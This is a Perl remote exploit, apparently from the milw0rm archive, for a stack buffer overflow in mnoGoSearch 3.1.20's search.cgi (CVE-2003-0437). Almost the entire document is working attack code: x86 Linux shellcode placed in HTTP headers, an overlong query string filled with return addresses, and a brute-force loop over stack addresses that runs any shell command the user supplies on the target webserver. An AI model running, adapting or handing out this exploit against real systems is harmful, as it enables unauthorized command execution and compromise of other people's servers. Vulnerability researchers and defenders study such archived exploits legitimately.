mnoGoSearch 3.1.20 - Remote Command Execution - CVE-2003-0437

1. #!/usr/bin/perl
2. #
3. # [ reloaded ]
4. # Remote Exploit for mnoGoSearch 3.1.20 that performs
5. # remote command execution as the webserver user id
6. # for linux ix86
7. # by pokleyzz
8. #
9.  
10. use IO::Socket;
11.  
12. $host = "127.0.0.1";
13. $cmd  = "ls -la";
14. $searchpath = "/cgi-bin/search.cgi";
15. $rawret = 0xbfff105c;
16. $ret = "";
17. $suffsize = 0;
18. $port = 80;
19.  
20. my $conn;
21.  
22.  
23. if ($ARGV[0]){
24.     $host = $ARGV[0];  
25. }
26. else {
27.     print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz\n\n";
28.     print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";
29.     print "\thost\thostname to exploit\n";
30.     print "\tcommand\tcommand to execute on server\n";
31.     print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
32.     print "\tport\tport to connect to\n";
33.     print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
34.     print "\tret\treturn address default bfffd0d0\n";
35.     exit;
36. }
37.  
38. if ($ARGV[1]){
39.     $cmd = $ARGV[1];   
40. }
41. if ($ARGV[2]){
42.     $searchpath = $ARGV[2];
43. }
44. if ($ARGV[3]){
45.     $port = int($ARGV[3]); 
46. }
47. if ($ARGV[4]){
48.     $suffsize = int($ARGV[4]); 
49. }  
50. if ($ARGV[5]){
51.     $rawret = hex_to_int($ARGV[5]);
52. }
53.  
54. #########~~ start function ~~#########
55. sub hex_to_int {
56.     my $hs = $_[0];  
57.     $int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) +
58.                          (hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
59.        
60. }
61.  
62. sub int_to_hex {
63.     my $in = $_[0];
64.     $hex = sprintf "%x",$in;
65. }
66.  
67. sub string_to_ret {
68.     my $rawret = $_[0];
69.     if (length($rawret) != 8){
70.         print $rawret;
71.         die "[*] incorrect return address ...\n ";
72.     } else {
73.         $ret = chr(hex(substr($rawret, 2, 2)));
74.         $ret .= chr(hex(substr($rawret, 0, 2)));
75.         $ret .= chr(hex(substr($rawret, 6, 2)));
76.             $ret .= chr(hex(substr($rawret, 4, 2)));
77.            
78.     }  
79.    
80. }
81.  
82. sub connect_to {
83.     #print "[x] Connect to $host on port $port ...\n";
84.     $conn = IO::Socket::INET->new (
85.                     Proto => "tcp",
86.                     PeerAddr => "$host",
87.                     PeerPort => "$port",
88.                     ) or die "[*] Can't connect to $host on port $port ...\n";
89.     $conn-> autoflush(1);
90. }
91.  
92. sub check_version {
93.     my $result;
94.     connect_to();
95.     print "[x] Check if $host use correct version ...\n";
96.     print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n";
97.    
98.     # capture result              
99.     while ($line = <$conn>) {
100.         $result .= $line;
101.         };
102.    
103.     close $conn;
104.     if ($result =~ /_test_/){
105.         print "[x] Correct version detected .. possibly vulnerable ...\n";
106.     } else {
107.         print $result;
108.         die "[x] New version or wrong url\n";
109.     }  
110. }
111.  
112. sub exploit {
113.     my $rw = $_[0];
114.     $result = "";
115.     # linux ix86 shellcode rip from phx.c by proton
116.     $shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
117.                  ."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
118.                  ."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
119.                  ."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
120.                  ."\x41\x41"
121.                  ."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
122.                  ."$cmd"
123.                  ."@";
124.     $strret = int_to_hex($rw);
125.     $ret = string_to_ret($strret);
126.     $envvar = 'B' x (4096 - length($shellcode));
127.     $envvar .= $shellcode;
128.    
129.     # generate query string
130.     $buffer = "B" x $suffsize;
131.     $buffer .= "B" x 4800;
132.     $buffer .= $ret x 200;
133.    
134.     $request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
135.            ."Accept: $envvar\n"
136.            ."Accept-Language: $envvar\n"
137.            ."Accept-Encoding: $envvar\n"
138.            ."User-Agent: Mozilla/4.0\n"
139.            ."Host: $host\n"
140.            ."Connection: Close\n\n";
141.    
142.     &connect_to;
143.     print "[x] Sending exploit code ..\n";
144.     print "[x] ret: $strret\n";
145.     print "[x] suf: $suffsize\n";
146.     print "[x] length:",length($request),"\n";
147.     print $conn "$request";
148.     while ($line = <$conn>) {
149.         $result .= $line;
150.         };
151.     close $conn;
152.    
153. }
154.  
155. sub check_result {
156.     if ($result =~ /hello/ && !($result =~ /text\/html/)){
157.         print $result;
158.         $success = 1;
159.     } else {
160.         print $result;
161.         print "[*] Failed ...\n";
162.         $success = 0;
163.     }
164. }
165. #########~~ end function ~~#########
166.  
167. &check_version;
168. for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
169.     &exploit($rawret);
170.     &check_result;
171.     if ($success == 1){
172.         exit;
173.     }
174.     sleep 1;
175. }
176.  
177. # milw0rm.com [2003-06-10]
178.